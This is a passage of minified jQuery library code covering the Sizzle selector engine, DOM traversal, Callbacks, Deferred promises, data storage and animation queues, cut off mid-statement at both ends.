n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),r.find.TAG=n.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):n.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},r.find.CLASS=n.getElementsByClassName&&function(e,t){if("undefined"!=typeof t.getElementsByClassName&&g)return t.getElementsByClassName(e)},v=[],y=[],(n.qsa=Q.test(d.querySelectorAll))&&(ue(function(e){h.appendChild(e).innerHTML="<a id='"+b+"'></a><select id='"+b+"-\r\\' msallowcapture=''><option selected=''></option></select>",e.querySelectorAll("[msallowcapture^='']").length&&y.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b+"+*").length||y.push(".#.+[+~]")}),ue(function(e){e.innerHTML="<a href='' disabled='disabled'></a><select disabled='disabled'><option/></select>";var t=d.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&y.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&y.push(":enabled",":disabled"),h.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&y.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),y.push(",.*:")})),(n.matchesSelector=Q.test(m=h.matches||h.webkitMatchesSelector||h.mozMatchesSelector||h.oMatchesSelector||h.msMatchesSelector))&&ue(function(e){n.disconnectedMatch=m.call(e,"*"),m.call(e,"[s!='']:x"),v.push("!=",W)}),y=y.length&&new RegExp(y.join("|")),v=v.length&&new RegExp(v.join("|")),t=Q.test(h.compareDocumentPosition),x=t||Q.test(h.contains)?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached&&t.compareDocumentPosition(e)===r?e===d||e.ownerDocument===w&&x(w,e)?-1:t===d||t.ownerDocument===w&&x(w,t)?1:c?O(c,e)-O(c,t):0:4&r?-1:1)}:function(e,t){if(e===t)return f=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e===d?-1:t===d?1:i?-1:o?1:c?O(c,e)-O(c,t):0;if(i===o)return ce(e,t);n=e;while(n=n.parentNode)a.unshift(n);n=t;while(n=n.parentNode)s.unshift(n);while(a[r]===s[r])r++;return r?ce(a[r],s[r]):a[r]===w?-1:s[r]===w?1:0},d):d},oe.matches=function(e,t){return oe(e,null,null,t)},oe.matchesSelector=function(e,t){if((e.ownerDocument||e)!==d&&p(e),t=t.replace(z,"='$1']"),n.matchesSelector&&g&&!S[t+" "]&&(!v||!v.test(t))&&(!y||!y.test(t)))try{var r=m.call(e,t);if(r||n.disconnectedMatch||e.document&&11!==e.document.nodeType)return r}catch(e){}return oe(t,d,null,[e]).length>0},oe.contains=function(e,t){return(e.ownerDocument||e)!==d&&p(e),x(e,t)},oe.attr=function(e,t){(e.ownerDocument||e)!==d&&p(e);var i=r.attrHandle[t.toLowerCase()],o=i&&N.call(r.attrHandle,t.toLowerCase())?i(e,t,!g):void 0;return void 0!==o?o:n.attributes||!g?e.getAttribute(t):(o=e.getAttributeNode(t))&&o.specified?o.value:null},oe.escape=function(e){return(e+"").replace(te,ne)},oe.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},oe.uniqueSort=function(e){var t,r=[],i=0,o=0;if(f=!n.detectDuplicates,c=!n.sortStable&&e.slice(0),e.sort(D),f){while(t=e[o++])t===e[o]&&(i=r.push(o));while(i--)e.splice(r[i],1)}return c=null,e},i=oe.getText=function(e){var t,n="",r=0,o=e.nodeType;if(o){if(1===o||9===o||11===o){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=i(e)}else if(3===o||4===o)return e.nodeValue}else while(t=e[r++])n+=i(t);return n},(r=oe.selectors={cacheLength:50,createPseudo:se,match:V,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(Z,ee),e[3]=(e[3]||e[4]||e[5]||"").replace(Z,ee),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||oe.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&oe.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return V.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&X.test(n)&&(t=a(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(Z,ee).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=E[e+" "];return t||(t=new RegExp("(^|"+M+")"+e+"("+M+"|$)"))&&E(e,function(e){return t.test("string"==typeof e.className&&e.className||"undefined"!=typeof e.getAttribute&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=oe.attr(r,e);return null==i?"!="===t:!t||(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i.replace($," ")+" ").indexOf(n)>-1:"|="===t&&(i===n||i.slice(0,n.length+1)===n+"-"))}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,u){var l,c,f,p,d,h,g=o!==a?"nextSibling":"previousSibling",y=t.parentNode,v=s&&t.nodeName.toLowerCase(),m=!u&&!s,x=!1;if(y){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===v:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?y.firstChild:y.lastChild],a&&m){x=(d=(l=(c=(f=(p=y)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1])&&l[2],p=d&&y.childNodes[d];while(p=++d&&p&&p[g]||(x=d=0)||h.pop())if(1===p.nodeType&&++x&&p===t){c[e]=[T,d,x];break}}else if(m&&(x=d=(l=(c=(f=(p=t)[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]||[])[0]===T&&l[1]),!1===x)while(p=++d&&p&&p[g]||(x=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===v:1===p.nodeType)&&++x&&(m&&((c=(f=p[b]||(p[b]={}))[p.uniqueID]||(f[p.uniqueID]={}))[e]=[T,x]),p===t))break;return(x-=i)===r||x%r==0&&x/r>=0}}},PSEUDO:function(e,t){var n,i=r.pseudos[e]||r.setFilters[e.toLowerCase()]||oe.error("unsupported pseudo: "+e);return i[b]?i(t):i.length>1?(n=[e,e,"",t],r.setFilters.hasOwnProperty(e.toLowerCase())?se(function(e,n){var r,o=i(e,t),a=o.length;while(a--)e[r=O(e,o[a])]=!(n[r]=o[a])}):function(e){return i(e,0,n)}):i}},pseudos:{not:se(function(e){var t=[],n=[],r=s(e.replace(B,"$1"));return r[b]?se(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),t[0]=null,!n.pop()}}),has:se(function(e){return function(t){return oe(e,t).length>0}}),contains:se(function(e){return e=e.replace(Z,ee),function(t){return(t.textContent||t.innerText||i(t)).indexOf(e)>-1}}),lang:se(function(e){return U.test(e||"")||oe.error("unsupported lang: "+e),e=e.replace(Z,ee).toLowerCase(),function(t){var n;do{if(n=g?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return(n=n.toLowerCase())===e||0===n.indexOf(e+"-")}while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===h},focus:function(e){return e===d.activeElement&&(!d.hasFocus||d.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:de(!1),disabled:de(!0),checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,!0===e.selected},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!r.pseudos.empty(e)},header:function(e){return Y.test(e.nodeName)},input:function(e){return G.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||"text"===t.toLowerCase())},first:he(function(){return[0]}),last:he(function(e,t){return[t-1]}),eq:he(function(e,t,n){return[n<0?n+t:n]}),even:he(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:he(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:he(function(e,t,n){for(var r=n<0?n+t:n;--r>=0;)e.push(r);return e}),gt:he(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}}).pseudos.nth=r.pseudos.eq;for(t in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})r.pseudos[t]=fe(t);for(t in{submit:!0,reset:!0})r.pseudos[t]=pe(t);function ye(){}ye.prototype=r.filters=r.pseudos,r.setFilters=new ye,a=oe.tokenize=function(e,t){var n,i,o,a,s,u,l,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,u=[],l=r.preFilter;while(s){n&&!(i=F.exec(s))||(i&&(s=s.slice(i[0].length)||s),u.push(o=[])),n=!1,(i=_.exec(s))&&(n=i.shift(),o.push({value:n,type:i[0].replace(B," ")}),s=s.slice(n.length));for(a in r.filter)!(i=V[a].exec(s))||l[a]&&!(i=l[a](i))||(n=i.shift(),o.push({value:n,type:a,matches:i}),s=s.slice(n.length));if(!n)break}return t?s.length:s?oe.error(e):k(e,u).slice(0)};function ve(e){for(var t=0,n=e.length,r="";t<n;t++)r+=e[t].value;return r}function me(e,t,n){var r=t.dir,i=t.next,o=i||r,a=n&&"parentNode"===o,s=C++;return t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||a)return e(t,n,i);return!1}:function(t,n,u){var l,c,f,p=[T,s];if(u){while(t=t[r])if((1===t.nodeType||a)&&e(t,n,u))return!0}else while(t=t[r])if(1===t.nodeType||a)if(f=t[b]||(t[b]={}),c=f[t.uniqueID]||(f[t.uniqueID]={}),i&&i===t.nodeName.toLowerCase())t=t[r]||t;else{if((l=c[o])&&l[0]===T&&l[1]===s)return p[2]=l[2];if(c[o]=p,p[2]=e(t,n,u))return!0}return!1}}function xe(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function be(e,t,n){for(var r=0,i=t.length;r<i;r++)oe(e,t[r],n);return n}function we(e,t,n,r,i){for(var o,a=[],s=0,u=e.length,l=null!=t;s<u;s++)(o=e[s])&&(n&&!n(o,r,i)||(a.push(o),l&&t.push(s)));return a}function Te(e,t,n,r,i,o){return r&&!r[b]&&(r=Te(r)),i&&!i[b]&&(i=Te(i,o)),se(function(o,a,s,u){var l,c,f,p=[],d=[],h=a.length,g=o||be(t||"*",s.nodeType?[s]:s,[]),y=!e||!o&&t?g:we(g,p,e,s,u),v=n?i||(o?e:h||r)?[]:a:y;if(n&&n(y,v,s,u),r){l=we(v,d),r(l,[],s,u),c=l.length;while(c--)(f=l[c])&&(v[d[c]]=!(y[d[c]]=f))}if(o){if(i||e){if(i){l=[],c=v.length;while(c--)(f=v[c])&&l.push(y[c]=f);i(null,v=[],l,u)}c=v.length;while(c--)(f=v[c])&&(l=i?O(o,f):p[c])>-1&&(o[l]=!(a[l]=f))}}else v=we(v===a?v.splice(h,v.length):v),i?i(null,a,v,u):L.apply(a,v)})}function Ce(e){for(var t,n,i,o=e.length,a=r.relative[e[0].type],s=a||r.relative[" "],u=a?1:0,c=me(function(e){return e===t},s,!0),f=me(function(e){return O(t,e)>-1},s,!0),p=[function(e,n,r){var i=!a&&(r||n!==l)||((t=n).nodeType?c(e,n,r):f(e,n,r));return t=null,i}];u<o;u++)if(n=r.relative[e[u].type])p=[me(xe(p),n)];else{if((n=r.filter[e[u].type].apply(null,e[u].matches))[b]){for(i=++u;i<o;i++)if(r.relative[e[i].type])break;return Te(u>1&&xe(p),u>1&&ve(e.slice(0,u-1).concat({value:" "===e[u-2].type?"*":""})).replace(B,"$1"),n,u<i&&Ce(e.slice(u,i)),i<o&&Ce(e=e.slice(i)),i<o&&ve(e))}p.push(n)}return xe(p)}function Ee(e,t){var n=t.length>0,i=e.length>0,o=function(o,a,s,u,c){var f,h,y,v=0,m="0",x=o&&[],b=[],w=l,C=o||i&&r.find.TAG("*",c),E=T+=null==w?1:Math.random()||.1,k=C.length;for(c&&(l=a===d||a||c);m!==k&&null!=(f=C[m]);m++){if(i&&f){h=0,a||f.ownerDocument===d||(p(f),s=!g);while(y=e[h++])if(y(f,a||d,s)){u.push(f);break}c&&(T=E)}n&&((f=!y&&f)&&v--,o&&x.push(f))}if(v+=m,n&&m!==v){h=0;while(y=t[h++])y(x,b,a,s);if(o){if(v>0)while(m--)x[m]||b[m]||(b[m]=j.call(u));b=we(b)}L.apply(u,b),c&&!o&&b.length>0&&v+t.length>1&&oe.uniqueSort(u)}return c&&(T=E,l=w),x};return n?se(o):o}return s=oe.compile=function(e,t){var n,r=[],i=[],o=S[e+" "];if(!o){t||(t=a(e)),n=t.length;while(n--)(o=Ce(t[n]))[b]?r.push(o):i.push(o);(o=S(e,Ee(i,r))).selector=e}return o},u=oe.select=function(e,t,n,i){var o,u,l,c,f,p="function"==typeof e&&e,d=!i&&a(e=p.selector||e);if(n=n||[],1===d.length){if((u=d[0]=d[0].slice(0)).length>2&&"ID"===(l=u[0]).type&&9===t.nodeType&&g&&r.relative[u[1].type]){if(!(t=(r.find.ID(l.matches[0].replace(Z,ee),t)||[])[0]))return n;p&&(t=t.parentNode),e=e.slice(u.shift().value.length)}o=V.needsContext.test(e)?0:u.length;while(o--){if(l=u[o],r.relative[c=l.type])break;if((f=r.find[c])&&(i=f(l.matches[0].replace(Z,ee),K.test(u[0].type)&&ge(t.parentNode)||t))){if(u.splice(o,1),!(e=i.length&&ve(u)))return L.apply(n,i),n;break}}}return(p||s(e,d))(i,t,!g,n,!t||K.test(e)&&ge(t.parentNode)||t),n},n.sortStable=b.split("").sort(D).join("")===b,n.detectDuplicates=!!f,p(),n.sortDetached=ue(function(e){return 1&e.compareDocumentPosition(d.createElement("fieldset"))}),ue(function(e){return e.innerHTML="<a href='#'></a>","#"===e.firstChild.getAttribute("href")})||le("type|href|height|width",function(e,t,n){if(!n)return e.getAttribute(t,"type"===t.toLowerCase()?1:2)}),n.attributes&&ue(function(e){return e.innerHTML="<input/>",e.firstChild.setAttribute("value",""),""===e.firstChild.getAttribute("value")})||le("value",function(e,t,n){if(!n&&"input"===e.nodeName.toLowerCase())return e.defaultValue}),ue(function(e){return null==e.getAttribute("disabled")})||le(P,function(e,t,n){var r;if(!n)return!0===e[t]?t.toLowerCase():(r=e.getAttributeNode(t))&&r.specified?r.value:null}),oe}(e);w.find=E,w.expr=E.selectors,w.expr[":"]=w.expr.pseudos,w.uniqueSort=w.unique=E.uniqueSort,w.text=E.getText,w.isXMLDoc=E.isXML,w.contains=E.contains,w.escapeSelector=E.escape;var k=function(e,t,n){var r=[],i=void 0!==n;while((e=e[t])&&9!==e.nodeType)if(1===e.nodeType){if(i&&w(e).is(n))break;r.push(e)}return r},S=function(e,t){for(var n=[];e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n},D=w.expr.match.needsContext;function N(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}var A=/^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i;function j(e,t,n){return g(t)?w.grep(e,function(e,r){return!!t.call(e,r,e)!==n}):t.nodeType?w.grep(e,function(e){return e===t!==n}):"string"!=typeof t?w.grep(e,function(e){return u.call(t,e)>-1!==n}):w.filter(t,e,n)}w.filter=function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?w.find.matchesSelector(r,e)?[r]:[]:w.find.matches(e,w.grep(t,function(e){return 1===e.nodeType}))},w.fn.extend({find:function(e){var t,n,r=this.length,i=this;if("string"!=typeof e)return this.pushStack(w(e).filter(function(){for(t=0;t<r;t++)if(w.contains(i[t],this))return!0}));for(n=this.pushStack([]),t=0;t<r;t++)w.find(e,i[t],n);return r>1?w.uniqueSort(n):n},filter:function(e){return this.pushStack(j(this,e||[],!1))},not:function(e){return this.pushStack(j(this,e||[],!0))},is:function(e){return!!j(this,"string"==typeof e&&D.test(e)?w(e):e||[],!1).length}});var q,L=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;(w.fn.init=function(e,t,n){var i,o;if(!e)return this;if(n=n||q,"string"==typeof e){if(!(i="<"===e[0]&&">"===e[e.length-1]&&e.length>=3?[null,e,null]:L.exec(e))||!i[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(i[1]){if(t=t instanceof w?t[0]:t,w.merge(this,w.parseHTML(i[1],t&&t.nodeType?t.ownerDocument||t:r,!0)),A.test(i[1])&&w.isPlainObject(t))for(i in t)g(this[i])?this[i](t[i]):this.attr(i,t[i]);return this}return(o=r.getElementById(i[2]))&&(this[0]=o,this.length=1),this}return e.nodeType?(this[0]=e,this.length=1,this):g(e)?void 0!==n.ready?n.ready(e):e(w):w.makeArray(e,this)}).prototype=w.fn,q=w(r);var H=/^(?:parents|prev(?:Until|All))/,O={children:!0,contents:!0,next:!0,prev:!0};w.fn.extend({has:function(e){var t=w(e,this),n=t.length;return this.filter(function(){for(var e=0;e<n;e++)if(w.contains(this,t[e]))return!0})},closest:function(e,t){var n,r=0,i=this.length,o=[],a="string"!=typeof e&&w(e);if(!D.test(e))for(;r<i;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(n.nodeType<11&&(a?a.index(n)>-1:1===n.nodeType&&w.find.matchesSelector(n,e))){o.push(n);break}return this.pushStack(o.length>1?w.uniqueSort(o):o)},index:function(e){return e?"string"==typeof e?u.call(w(e),this[0]):u.call(this,e.jquery?e[0]:e):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){return this.pushStack(w.uniqueSort(w.merge(this.get(),w(e,t))))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function P(e,t){while((e=e[t])&&1!==e.nodeType);return e}w.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return k(e,"parentNode")},parentsUntil:function(e,t,n){return k(e,"parentNode",n)},next:function(e){return P(e,"nextSibling")},prev:function(e){return P(e,"previousSibling")},nextAll:function(e){return k(e,"nextSibling")},prevAll:function(e){return k(e,"previousSibling")},nextUntil:function(e,t,n){return k(e,"nextSibling",n)},prevUntil:function(e,t,n){return k(e,"previousSibling",n)},siblings:function(e){return S((e.parentNode||{}).firstChild,e)},children:function(e){return S(e.firstChild)},contents:function(e){return N(e,"iframe")?e.contentDocument:(N(e,"template")&&(e=e.content||e),w.merge([],e.childNodes))}},function(e,t){w.fn[e]=function(n,r){var i=w.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof r&&(i=w.filter(r,i)),this.length>1&&(O[e]||w.uniqueSort(i),H.test(e)&&i.reverse()),this.pushStack(i)}});var M=/[^\x20\t\r\n\f]+/g;function R(e){var t={};return w.each(e.match(M)||[],function(e,n){t[n]=!0}),t}w.Callbacks=function(e){e="string"==typeof e?R(e):w.extend({},e);var t,n,r,i,o=[],a=[],s=-1,u=function(){for(i=i||e.once,r=t=!0;a.length;s=-1){n=a.shift();while(++s<o.length)!1===o[s].apply(n[0],n[1])&&e.stopOnFalse&&(s=o.length,n=!1)}e.memory||(n=!1),t=!1,i&&(o=n?[]:"")},l={add:function(){return o&&(n&&!t&&(s=o.length-1,a.push(n)),function t(n){w.each(n,function(n,r){g(r)?e.unique&&l.has(r)||o.push(r):r&&r.length&&"string"!==x(r)&&t(r)})}(arguments),n&&!t&&u()),this},remove:function(){return w.each(arguments,function(e,t){var n;while((n=w.inArray(t,o,n))>-1)o.splice(n,1),n<=s&&s--}),this},has:function(e){return e?w.inArray(e,o)>-1:o.length>0},empty:function(){return o&&(o=[]),this},disable:function(){return i=a=[],o=n="",this},disabled:function(){return!o},lock:function(){return i=a=[],n||t||(o=n=""),this},locked:function(){return!!i},fireWith:function(e,n){return i||(n=[e,(n=n||[]).slice?n.slice():n],a.push(n),t||u()),this},fire:function(){return l.fireWith(this,arguments),this},fired:function(){return!!r}};return l};function I(e){return e}function W(e){throw e}function $(e,t,n,r){var i;try{e&&g(i=e.promise)?i.call(e).done(t).fail(n):e&&g(i=e.then)?i.call(e,t,n):t.apply(void 0,[e].slice(r))}catch(e){n.apply(void 0,[e])}}w.extend({Deferred:function(t){var n=[["notify","progress",w.Callbacks("memory"),w.Callbacks("memory"),2],["resolve","done",w.Callbacks("once memory"),w.Callbacks("once memory"),0,"resolved"],["reject","fail",w.Callbacks("once memory"),w.Callbacks("once memory"),1,"rejected"]],r="pending",i={state:function(){return r},always:function(){return o.done(arguments).fail(arguments),this},"catch":function(e){return i.then(null,e)},pipe:function(){var e=arguments;return w.Deferred(function(t){w.each(n,function(n,r){var i=g(e[r[4]])&&e[r[4]];o[r[1]](function(){var e=i&&i.apply(this,arguments);e&&g(e.promise)?e.promise().progress(t.notify).done(t.resolve).fail(t.reject):t[r[0]+"With"](this,i?[e]:arguments)})}),e=null}).promise()},then:function(t,r,i){var o=0;function a(t,n,r,i){return function(){var s=this,u=arguments,l=function(){var e,l;if(!(t<o)){if((e=r.apply(s,u))===n.promise())throw new TypeError("Thenable self-resolution");l=e&&("object"==typeof e||"function"==typeof e)&&e.then,g(l)?i?l.call(e,a(o,n,I,i),a(o,n,W,i)):(o++,l.call(e,a(o,n,I,i),a(o,n,W,i),a(o,n,I,n.notifyWith))):(r!==I&&(s=void 0,u=[e]),(i||n.resolveWith)(s,u))}},c=i?l:function(){try{l()}catch(e){w.Deferred.exceptionHook&&w.Deferred.exceptionHook(e,c.stackTrace),t+1>=o&&(r!==W&&(s=void 0,u=[e]),n.rejectWith(s,u))}};t?c():(w.Deferred.getStackHook&&(c.stackTrace=w.Deferred.getStackHook()),e.setTimeout(c))}}return w.Deferred(function(e){n[0][3].add(a(0,e,g(i)?i:I,e.notifyWith)),n[1][3].add(a(0,e,g(t)?t:I)),n[2][3].add(a(0,e,g(r)?r:W))}).promise()},promise:function(e){return null!=e?w.extend(e,i):i}},o={};return w.each(n,function(e,t){var a=t[2],s=t[5];i[t[1]]=a.add,s&&a.add(function(){r=s},n[3-e][2].disable,n[3-e][3].disable,n[0][2].lock,n[0][3].lock),a.add(t[3].fire),o[t[0]]=function(){return o[t[0]+"With"](this===o?void 0:this,arguments),this},o[t[0]+"With"]=a.fireWith}),i.promise(o),t&&t.call(o,o),o},when:function(e){var t=arguments.length,n=t,r=Array(n),i=o.call(arguments),a=w.Deferred(),s=function(e){return function(n){r[e]=this,i[e]=arguments.length>1?o.call(arguments):n,--t||a.resolveWith(r,i)}};if(t<=1&&($(e,a.done(s(n)).resolve,a.reject,!t),"pending"===a.state()||g(i[n]&&i[n].then)))return a.then();while(n--)$(i[n],s(n),a.reject);return a.promise()}});var B=/^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/;w.Deferred.exceptionHook=function(t,n){e.console&&e.console.warn&&t&&B.test(t.name)&&e.console.warn("jQuery.Deferred exception: "+t.message,t.stack,n)},w.readyException=function(t){e.setTimeout(function(){throw t})};var F=w.Deferred();w.fn.ready=function(e){return F.then(e)["catch"](function(e){w.readyException(e)}),this},w.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--w.readyWait:w.isReady)||(w.isReady=!0,!0!==e&&--w.readyWait>0||F.resolveWith(r,[w]))}}),w.ready.then=F.then;function _(){r.removeEventListener("DOMContentLoaded",_),e.removeEventListener("load",_),w.ready()}"complete"===r.readyState||"loading"!==r.readyState&&!r.documentElement.doScroll?e.setTimeout(w.ready):(r.addEventListener("DOMContentLoaded",_),e.addEventListener("load",_));var z=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"===x(n)){i=!0;for(s in n)z(e,t,s,n[s],!0,o,a)}else if(void 0!==r&&(i=!0,g(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(w(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},X=/^-ms-/,U=/-([a-z])/g;function V(e,t){return t.toUpperCase()}function G(e){return e.replace(X,"ms-").replace(U,V)}var Y=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function Q(){this.expando=w.expando+Q.uid++}Q.uid=1,Q.prototype={cache:function(e){var t=e[this.expando];return t||(t={},Y(e)&&(e.nodeType?e[this.expando]=t:Object.defineProperty(e,this.expando,{value:t,configurable:!0}))),t},set:function(e,t,n){var r,i=this.cache(e);if("string"==typeof t)i[G(t)]=n;else for(r in t)i[G(r)]=t[r];return i},get:function(e,t){return void 0===t?this.cache(e):e[this.expando]&&e[this.expando][G(t)]},access:function(e,t,n){return void 0===t||t&&"string"==typeof t&&void 0===n?this.get(e,t):(this.set(e,t,n),void 0!==n?n:t)},remove:function(e,t){var n,r=e[this.expando];if(void 0!==r){if(void 0!==t){n=(t=Array.isArray(t)?t.map(G):(t=G(t))in r?[t]:t.match(M)||[]).length;while(n--)delete r[t[n]]}(void 0===t||w.isEmptyObject(r))&&(e.nodeType?e[this.expando]=void 0:delete e[this.expando])}},hasData:function(e){var t=e[this.expando];return void 0!==t&&!w.isEmptyObject(t)}};var J=new Q,K=new Q,Z=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,ee=/[A-Z]/g;function te(e){return"true"===e||"false"!==e&&("null"===e?null:e===+e+""?+e:Z.test(e)?JSON.parse(e):e)}function ne(e,t,n){var r;if(void 0===n&&1===e.nodeType)if(r="data-"+t.replace(ee,"-$&").toLowerCase(),"string"==typeof(n=e.getAttribute(r))){try{n=te(n)}catch(e){}K.set(e,t,n)}else n=void 0;return n}w.extend({hasData:function(e){return K.hasData(e)||J.hasData(e)},data:function(e,t,n){return K.access(e,t,n)},removeData:function(e,t){K.remove(e,t)},_data:function(e,t,n){return J.access(e,t,n)},_removeData:function(e,t){J.remove(e,t)}}),w.fn.extend({data:function(e,t){var n,r,i,o=this[0],a=o&&o.attributes;if(void 0===e){if(this.length&&(i=K.get(o),1===o.nodeType&&!J.get(o,"hasDataAttrs"))){n=a.length;while(n--)a[n]&&0===(r=a[n].name).indexOf("data-")&&(r=G(r.slice(5)),ne(o,r,i[r]));J.set(o,"hasDataAttrs",!0)}return i}return"object"==typeof e?this.each(function(){K.set(this,e)}):z(this,function(t){var n;if(o&&void 0===t){if(void 0!==(n=K.get(o,e)))return n;if(void 0!==(n=ne(o,e)))return n}else this.each(function(){K.set(this,e,t)})},null,t,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){K.remove(this,e)})}}),w.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=J.get(e,t),n&&(!r||Array.isArray(n)?r=J.access(e,t,w.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=w.queue(e,t),r=n.length,i=n.shift(),o=w._queueHooks(e,t),a=function(){w.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return J.get(e,n)||J.access(e,n,{empty:w.Callbacks("once memory").add(function(){J.remove(e,[t+"queue",n])})})}}),w.fn.extend({queue:function(e,t){var n=2;return"string"!=typeof e&&(t=e,e="fx",n--),arguments.length<n?w.queue(this[0],e):void 0===t?this:this.each(function(){var n=w.queue(this,e,t);w._queueHooks(this,e),"fx"===e&&"inprogress"!==n[0]&&w.dequeue(this,e)})},dequeue:function(e){return this.each(function(){w.dequeue(this,e)})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,t){var n,r=1,i=w.Deferred(),o=this,a=this.length,s=function(){--r||i.resolveWith(o,[o])};"string"!=typeof 